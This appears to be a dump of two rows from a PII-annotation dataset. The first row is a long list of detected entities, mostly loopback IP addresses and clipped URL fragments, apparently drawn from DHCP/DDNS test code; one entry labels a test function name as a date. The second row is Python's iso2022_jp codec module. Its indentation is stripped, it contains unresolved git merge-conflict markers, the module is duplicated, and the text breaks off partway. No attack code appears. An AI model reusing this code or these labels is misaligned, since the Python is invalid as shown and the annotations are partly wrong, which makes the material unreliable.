| 40,763 | [['DATE_TIME', 'test_ddns4_notsig_forw_and_rev_notenabled_Sflag'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.exae.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.exae.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.cl'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client2.four.example.com'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client2.four.example.com'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com']] |
13 | <<<<<<< HEAD
<<<<<<< HEAD
#
# iso2022_jp.py: Python Unicode Codec for ISO2022_JP
#
# Written by Hye-Shik Chang dummy@email.com
#
import _codecs_iso2022, codecs
import _multibytecodec as mbc
codec = _codecs_iso2022.getcodec('iso2022_jp')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='iso2022_jp',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
=======
#
# iso2022_jp.py: Python Unicode Codec for ISO2022_JP
#
# Written by Hye-Shik Chang dummy@email.com
#
import _codecs_iso2022, codecs
import _multibytecodec as mbc
codec = _codecs_iso2022.getcodec('iso2022_jp')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='iso2022_jp',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
>>>>>>> PI:KEY
=======
#
# iso2022_jp.py: Python Unicode Codec for ISO2022_JP
#
